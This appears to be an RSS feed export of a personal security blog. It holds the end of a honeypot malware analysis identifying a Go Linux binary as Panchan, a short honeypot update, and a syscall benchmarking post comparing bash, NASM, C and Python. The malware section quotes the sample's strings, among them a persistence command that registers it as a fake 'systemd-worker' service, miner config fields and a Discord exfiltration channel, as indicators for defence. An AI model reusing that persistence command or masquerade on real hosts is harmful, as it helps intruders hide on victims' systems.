&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -Ir mymalware
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;e cfg.bigendian=false
e asm.bits=64
e asm.dwarf=true
e asm.codealign=1
e bin.lang=c
e file.type=elf
e asm.os=linux
e asm.arch=x86
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So it's pretty clear that we are taking a look at a linux binary. Why is it interesting? What I usually find in my honeypot are IRC based miners, scripts for initial deployment and some keys, but this is slightly different. &lt;/p&gt;

&lt;p&gt;I took a very quick look at the strings, and realized it used Golang. The file itself is stripped, as I realized when using &lt;code&gt;&amp;gt;afl | head -n20&lt;/code&gt; (just 20 lines so to take a look) even when &lt;a href="https://go-re.tk/redress/" rel="noopener noreferrer"&gt;using a pipe with &lt;code&gt;redress&lt;/code&gt;&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3c99y5c5dbc8g1oodx9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3c99y5c5dbc8g1oodx9.png" alt="Image description" width="411" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This didn't stop me. I took a quick look around. I used &lt;code&gt;binwalk&lt;/code&gt; and &lt;code&gt;strings&lt;/code&gt;. I proceeded to note down some general clear ideas:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It uses Golang&lt;/li&gt;
&lt;li&gt;It's an elf for AMD x86-64 architecture&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Anyway, I tried to look for executable paths and exfiltration traces or maybe C2, since those are the common things found in bots or maybe stealers. I have a bunch of keywords that help me dive through this sort of thing, and I found a suspicious hardcoded IP in &lt;code&gt;/etc/services&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;100.64.0[.]0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A really quick search over VT revealed a pulse related to the &lt;strong&gt;GoScanSSH family&lt;/strong&gt;, which pretty much fits this situation.&lt;/p&gt;

&lt;p&gt;I keep searching:&lt;/p&gt;

&lt;p&gt;Realized that it also tries to identify the IP using some legit IP info services online, such as&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http://ipgrab[.]io
https://ident[.]me
https://ip.seeip[.]org
http://inet-ip[.]info
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And saves it all into a zip file. I wondered where it meant to send it and I found a hardcoded &lt;strong&gt;Discord&lt;/strong&gt; API location, so that must be it, since Discord (as well as Telegram) is currently being used a lot for exfiltration.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3wlww0pf7hawqa6rb61r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3wlww0pf7hawqa6rb61r.png" alt="Image description" width="369" height="68"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then I found some command lines (for example chmod attempts, but not for example chattr or ulimit, which usually go together in regular miner families) that grabbed my attention:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;service systemd-worker enable || systemctl enable systemd-worker.service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Basically because that "systemd-worker" thing sounded familiar. I remember reading about this before so a quick search and yep! It reminded me of &lt;a href="https://www.bleepingcomputer.com/news/security/new-peer-to-peer-botnet-infects-linux-servers-with-cryptominers/" rel="noopener noreferrer"&gt;Panchan&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;"(...)Finally, the malware executes the binary and initiates an HTTPS POST operation to a Discord webhook, which is likely used for monitoring the victim.&lt;/p&gt;

&lt;p&gt;To establish persistence, the malware copies itself to &lt;code&gt;/bin/systemd-worker&lt;/code&gt; and creates a new systemd service to launch after reboot while masquerading as a legitimate system service.(..)"&lt;/p&gt;

&lt;p&gt;It adds up. &lt;/p&gt;

&lt;p&gt;This definitely rang a bell, so I looked for some more info about it and I found some "look and destroy"-like (as I like to call it) function:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;current_preset_xmrig_enabled *bool; current_preset_xmrig_nicehash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Yeah this totally looked like &lt;strong&gt;Panchan&lt;/strong&gt;. And, according to Bleeping Computer:&lt;/p&gt;

&lt;p&gt;"&lt;em&gt;The malware also features an anti-kill system that detects process termination signals and ignores them unless it's SIGKILL which isn't handled.&lt;/em&gt;"&lt;/p&gt;

&lt;p&gt;I also saw this before going around, so I rechecked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SIGKILL: kill
SIGQUIT: quit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And... yeah, after reading the &lt;a href="https://www.akamai.com/blog/security-research/new-p2p-botnet-panchan" rel="noopener noreferrer"&gt;Akamai article&lt;/a&gt; I saw this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fucyivj815u4g5ipj8oxt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fucyivj815u4g5ipj8oxt.png" alt="Image description" width="553" height="50"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0wcrlbove8s6j8mp0suj.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0wcrlbove8s6j8mp0suj.jpg" alt="Image description" width="720" height="960"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you are wondering: yes, I checked previously with an automated genetic analysis and static analysis vendors, but it wasn't very helpful and didn't point me to the actual threat (mostly because it was corrupted, but that doesn't mean it doesn't have information in it!).&lt;/p&gt;

&lt;p&gt;Anyway, this has been fun. I totally have to sharpen my reversing abilities to do this "the proper way" and not "string | grep" it. &lt;/p&gt;

&lt;p&gt;You can check the IoCs in my &lt;a href="https://otx.alienvault.com/pulse/65819d0507d07796371bc4fb" rel="noopener noreferrer"&gt;AlienVault pulse&lt;/a&gt;!&lt;br&gt;
If you want to read the Japanese version, check &lt;a href="https://qiita.com/terceranexus6/items/6ca2f007d75c0659768d" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>security</category>
      <category>malware</category>
      <category>linux</category>
    </item>
    <item>
      <title>The broken spaceship Honeypot updates</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Fri, 15 Dec 2023 10:39:26 +0000</pubDate>
      <link>https://forem.com/terceranexus6/the-broken-spaceship-honeypot-updates-5gk8</link>
      <guid>https://forem.com/terceranexus6/the-broken-spaceship-honeypot-updates-5gk8</guid>
      <description>&lt;p&gt;As I already mentioned in previous posts, I've been working towards custom cowrie honeypots to gather information related to Linux threats. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fijo67cn5frxln42tdyj8.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fijo67cn5frxln42tdyj8.gif" alt="gif of a man collecting honey saying " width="480" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I recently updated it, and updated the readme description with the step by step guide in the &lt;a href="https://git.sr.ht/~alienagain/honeypot_notes" rel="noopener noreferrer"&gt;repo&lt;/a&gt; and the &lt;a href="https://alienagain.flounder.online/creating_honeypot.gmi" rel="noopener noreferrer"&gt;gemini&lt;/a&gt; blog, to include some fixes for common issues I found this year when resetting the whole thing (such as python misconfiguration, docker permissions, file permissions and more), adding an extra drop of information related to &lt;a href="https://github.com/cowrie/cowrie" rel="noopener noreferrer"&gt;cowrie&lt;/a&gt;, which already has good documentation and a few articles out there. I hope my issues and the way I took care of them serve as a time-saver for other people interested in setting up their own thing. &lt;/p&gt;

&lt;p&gt;Friendly reminder I share the IoCs and thoughts related to this project from time to time in &lt;a href="https://brokenspaceship.com/" rel="noopener noreferrer"&gt;The broken spaceship&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>security</category>
      <category>linux</category>
    </item>
    <item>
      <title>CALL me, maybe</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Mon, 30 Oct 2023 13:15:12 +0000</pubDate>
      <link>https://forem.com/terceranexus6/call-me-maybe-1jg2</link>
      <guid>https://forem.com/terceranexus6/call-me-maybe-1jg2</guid>
      <description>&lt;p&gt;When I was studying computer engineering at university I was a huge assembly nerd, and it fueled my love for low level stuff. Years after, I haven't really used assembly, so I forgot almost all about it and I decided to give it a go to remember a little bit about it, so I decided to re-do (from memory and with the help of the Internet) one of the activities I did back then: benchmarking assembly against another language doing the very same thing. Back then I did a Hello world thing, but since I know better now, I decided to have a bit more fun and I created a comparison script. The script is simple: it asks you to write something, if that something is "hello" it greets you back. &lt;/p&gt;

&lt;p&gt;Let's take a look at such a script in bash, my fav scripting language:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#!/bin/bash
read -p"Enter command: " ANS
if [ "$ANS" == "hola" ]; then
    echo "hola, que tal"
else
    echo "ERROR"
fi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Easy peasy. Now let's do the same thing in NASM assembly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;section .data
   msg1:      db   'Hola, que tal',10 ; msg1
   lenmsg1:   equ   $-msg1 ; length msg1
   msg2:      db   'ERROR',10 ; msg2
   lenmsg2:   equ   $-msg2 ; length msg2
   str2:      db   'hola' ; str2
   lenstr2:   equ   $-str2 ; length str2
   userMsg db 'Please enter order: ' ;Prompt shown to the user
   lenUserMsg equ $-userMsg             ;The length of the message
   dispMsg db 'The computer says: '
   lenDispMsg equ $-dispMsg  
section .bss
   reply resb 5
section .text
   global _start
_start:
   ;Print the prompt: write(stdout, userMsg, lenUserMsg)
   mov eax, 4
   mov ebx, 1
   mov ecx, userMsg
   mov edx, lenUserMsg
   int 80h
   ;Read and store the user input: read(stdin, reply, 5)
   mov eax, 3
   mov ebx, 0          ;fd 0 is stdin
   mov ecx, reply  
   mov edx, 5          ;5 bytes: 'hola' plus the newline
   int 80h
   ;Output the message 'The computer says: '
   mov eax, 4
   mov ebx, 1
   mov ecx, dispMsg
   mov edx, lenDispMsg
   int 80h 
   mov esi,reply
   mov edi,str2
   mov ecx,lenstr2     ;compare exactly the bytes of str2
   cld
   repe cmpsb
   je good             ;ZF is set when every compared byte matched
   ; If bad
   mov eax,4
   mov ebx,1
   mov ecx,msg2
   mov edx,lenmsg2
   int 80h
   jmp exit
good:
   mov eax,4
   mov ebx,1
   mov ecx,msg1
   mov edx,lenmsg1
   int 80h
exit:
   mov eax,1
   mov ebx,0
   int 80h
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, let's compile the NASM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ nasm -f elf hellothere.asm
$ ld -m elf_i386 -s -o hellothereas hellothere.o 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nice! Let's execute both and see how it works:&lt;/p&gt;

&lt;p&gt;BASH:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./hellothere.sh
Enter command: hola
hola, que tal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, assembly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./hellothereas
Please enter order: hola
The computer says: hola, que tal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks good to me. Now the fun part! We are using &lt;code&gt;strace&lt;/code&gt; to measure the basics of both scripts. Wanna learn more? This &lt;a href="https://unix.stackexchange.com/questions/399614/how-can-i-measure-the-speed-performance-of-a-program" rel="noopener noreferrer"&gt;Stack Exchange thread&lt;/a&gt; is pretty nice. Now, let's get to it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strace -o trace_bash -c -Ttt ./hellothere.sh 
strace: -t/--absolute-timestamps has no effect with -c/--summary-only
strace: -T/--syscall-times has no effect with -c/--summary-only
Enter command: hola
hola, que tal

strace -o trace_assembly -c -Ttt ./hellothereas
strace: -t/--absolute-timestamps has no effect with -c/--summary-only
strace: -T/--syscall-times has no effect with -c/--summary-only
Please enter order: hola
The computer says: Hola, que tal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The benchmarking is inside the &lt;code&gt;trace_assembly&lt;/code&gt; and &lt;code&gt;trace_bash&lt;/code&gt; files, let's take a look:&lt;/p&gt;

&lt;p&gt;ASSEMBLY:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
100.00    0.000476         476         1           execve
------ ----------- ----------- --------- --------- ----------------
100.00    0.000476         476         1           total
System call usage summary for 32 bit mode:
% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 51.92    0.000027          27         1           read
 48.08    0.000025           8         3           write
------ ----------- ----------- --------- --------- ----------------
100.00    0.000052          13         4           total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;BASH:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         6           read
  0.00    0.000000           0         2           write
  0.00    0.000000           0         7           close
  0.00    0.000000           0         3           lseek
  0.00    0.000000           0        14           mmap
  0.00    0.000000           0         4           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         3           brk
  0.00    0.000000           0        14           rt_sigaction
  0.00    0.000000           0         5           rt_sigprocmask
  0.00    0.000000           0         4         2 ioctl
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           dup2
  0.00    0.000000           0         3           getpid
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         1           uname
  0.00    0.000000           0         3         1 fcntl
  0.00    0.000000           0         1           sysinfo
  0.00    0.000000           0         1           getuid
  0.00    0.000000           0         1           getgid
  0.00    0.000000           0         1           geteuid
  0.00    0.000000           0         1           getegid
  0.00    0.000000           0         3           getppid
  0.00    0.000000           0         1           getpgrp
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         7           openat
  0.00    0.000000           0        18           newfstatat
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         3           prlimit64
  0.00    0.000000           0         1           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000           0       121         5 total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I know what you are thinking. "You didn't compile the bash!" &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk9vm21keqsnqhhgabo8g.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk9vm21keqsnqhhgabo8g.gif" alt="character from seinfield saying I like the way you think" width="480" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Okay then let's try that, shall we:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;shc -f hellothere.sh
mv hellothere.sh.x hellothere_bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And benchmarking!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strace -o trace_bash_ex -c -Ttt ./hellothere_bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's take a look!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 37.69    0.000652         163         4           execve
 15.84    0.000274           6        44           mmap
  7.86    0.000136           3        35           newfstatat
  5.49    0.000095           5        16           openat
  4.34    0.000075           2        31           rt_sigaction
  3.87    0.000067           4        14           mprotect
  3.12    0.000054           7         7           read
  2.83    0.000049           3        16           close
  2.49    0.000043          10         4           munmap
  1.85    0.000032           2        16           pread64
  1.79    0.000031           3        10           rt_sigprocmask
  1.73    0.000030          15         2           write
  1.62    0.000028           2        12           brk
  0.98    0.000017           2         8           getpid
  0.92    0.000016           2         6           getppid
  0.81    0.000014           2         5         2 ioctl
  0.81    0.000014           3         4         4 access
  0.75    0.000013           1         8         4 arch_prctl
  0.58    0.000010           5         2           sysinfo
  0.58    0.000010           1         6           prlimit64
  0.52    0.000009           2         4           getrandom
  0.46    0.000008           2         4           rseq
  0.40    0.000007           3         2           futex
  0.40    0.000007           1         4           set_tid_address
  0.40    0.000007           1         4           set_robust_list
  0.29    0.000005           2         2         2 getpeername
  0.29    0.000005           2         2           uname
  0.29    0.000005           2         2           getuid
  0.29    0.000005           2         2           getpgrp
  0.23    0.000004           2         2           getgid
  0.23    0.000004           2         2           geteuid
  0.23    0.000004           2         2           getegid
------ ----------- ----------- --------- --------- ----------------
100.00    0.001730           6       282        12 total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Wow! You know what? You can actually compile stuff using something called "Optimization", which is pretty much assembly magic, or the non-lazy way, which takes a little bit more compile-time processing but the result is optimized. Did you know?&lt;/p&gt;

&lt;p&gt;Let me show you using a C version of this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#include&amp;lt;stdio.h&amp;gt;
#include&amp;lt;string.h&amp;gt;

char *mygets(char *buf, size_t size) {
    if (buf != NULL &amp;amp;&amp;amp; size &amp;gt; 0) {
        if (fgets(buf, size, stdin)) {
            buf[strcspn(buf, "\n")] = '\0';
            return buf;
        }
        *buf = '\0';  /* clear buffer at end of file */
    }
    return NULL;
}

int string_compare(char str1[], char str2[])
{
    int ctr=0;

    while(str1[ctr]==str2[ctr])
    {
        if(str1[ctr]=='\0'||str2[ctr]=='\0')
            break;
        ctr++;
    }
    if(str1[ctr]=='\0' &amp;amp;&amp;amp; str2[ctr]=='\0')
        return 0;
    else
        return -1;
}


int main()
{
    char a[100];
    char b[] = "hola";
    printf("Enter command\n");    
    mygets(a, sizeof a);    

    if( string_compare(a,b) == 0 )
        printf("hola que tal\n");
    else
        printf("ERROR.\n");
    return 0;
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Before going forward, some clarifications:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;I used a "mygets" function so to substitute "gets" function, the reason is &lt;a href="https://stackoverflow.com/questions/34031514/implicit-declaration-of-gets" rel="noopener noreferrer"&gt;over here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;I used a function for comparing instead of strcmp (inspired by &lt;a href="https://stackoverflow.com/questions/14232990/comparing-two-strings-in-c" rel="noopener noreferrer"&gt;this one&lt;/a&gt;) so to be in control and make it as low level as possible.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's compile it!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gcc -o hello_in_c hello.c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now benchmarking:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strace -o trace_forc -c -Ttt ./hello_in_c
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And this is the result with default optimization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         2           read
  0.00    0.000000           0         2           write
  0.00    0.000000           0         2           close
  0.00    0.000000           0         8           mmap
  0.00    0.000000           0         3           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         3           brk
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         2           openat
  0.00    0.000000           0         4           newfstatat
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         1           prlimit64
  0.00    0.000000           0         1           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000           0        40         2 total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyu3ob0mm22sqeer6idk0.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyu3ob0mm22sqeer6idk0.gif" alt="man saying nice meme" width="450" height="360"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Optimizations &lt;code&gt;-O2&lt;/code&gt;, &lt;code&gt;-O3&lt;/code&gt; and &lt;code&gt;-Ofast&lt;/code&gt; give me the same strace results.&lt;/p&gt;

&lt;p&gt;Let's check maybe in Python? This is the last language, I promise!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import re

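def compare_strings(string1, string2):
    # Escape the expected word and require a full match, so the user's
    # input is treated as literal text and never as a regular expression.
    pattern = re.compile(re.escape(string1))
    match = pattern.fullmatch(string2)

    if match:
        print("hola, que tal")
    else:
        print("ERROR")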

string1 = "hola"
string2 = input("Enter command:")


compare_strings(string1, string2) 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;First let's &lt;code&gt;strace&lt;/code&gt; the script itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ strace -o trace_python1 -c -Ttt python3 hello.py
$ strings trace_python1

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 31.95    0.001331           4       328        58 newfstatat
 22.28    0.000928          42        22           getdents64
 10.95    0.000456           4        97           read
 10.35    0.000431           6        66         3 openat
  5.74    0.000239           3        66           close
  5.52    0.000230           2        91         3 lseek
  4.30    0.000179           2        63        52 ioctl
  3.84    0.000160           2        66           rt_sigaction
  3.02    0.000126          10        12           brk
  0.96    0.000040           1        28           mmap
  0.41    0.000017           4         4         3 readlink
  0.17    0.000007           2         3           dup
  0.17    0.000007           7         1           sysinfo
  0.10    0.000004           2         2           getcwd
  0.07    0.000003           3         1           getuid
  0.05    0.000002           2         1           fcntl
  0.05    0.000002           2         1           getgid
  0.05    0.000002           2         1           geteuid
  0.05    0.000002           2         1           getegid
  0.00    0.000000           0         2           write
  0.00    0.000000           0         8           mprotect
  0.00    0.000000           0         2           munmap
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         1           prlimit64
  0.00    0.000000           0         2           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.004166           4       881       121 total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2fpkvdhxo0frebdwlbp.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2fpkvdhxo0frebdwlbp.gif" alt="woman saying wow  okay" width="480" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now let's compile it! For python, the most popular compiling tool is pyinstaller&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ pyinstaller hello.py
$ cd dist/hello
$ strace -o trace_python2 -c -Ttt ./hello
$ cat trace_python2

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 29.59    0.000377           1       209           read
 22.61    0.000288           2       122        15 openat
 12.24    0.000156           0       176         3 lseek
 10.83    0.000138           0       162        15 newfstatat
  8.79    0.000112           1       110           close
  8.16    0.000104           4        21           brk
  6.59    0.000084           0        86        76 ioctl
  0.71    0.000009           0        69           mmap
  0.47    0.000006           1         4           getcwd
  0.00    0.000000           0         2           write
  0.00    0.000000           0         2           lstat
  0.00    0.000000           0        20           mprotect
  0.00    0.000000           0         6           munmap
  0.00    0.000000           0        66           rt_sigaction
  0.00    0.000000           0         8           pread64
  0.00    0.000000           0         2         2 access
  0.00    0.000000           0         3           dup
  0.00    0.000000           0         2           execve
  0.00    0.000000           0         1           fcntl
  0.00    0.000000           0         3         1 readlink
  0.00    0.000000           0         1           sysinfo
  0.00    0.000000           0         4         2 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         4           getdents64
  0.00    0.000000           0         2           set_tid_address
  0.00    0.000000           0         2           set_robust_list
  0.00    0.000000           0         2           prlimit64
  0.00    0.000000           0         3           getrandom
  0.00    0.000000           0         2           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.001274           1      1095       114 total

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



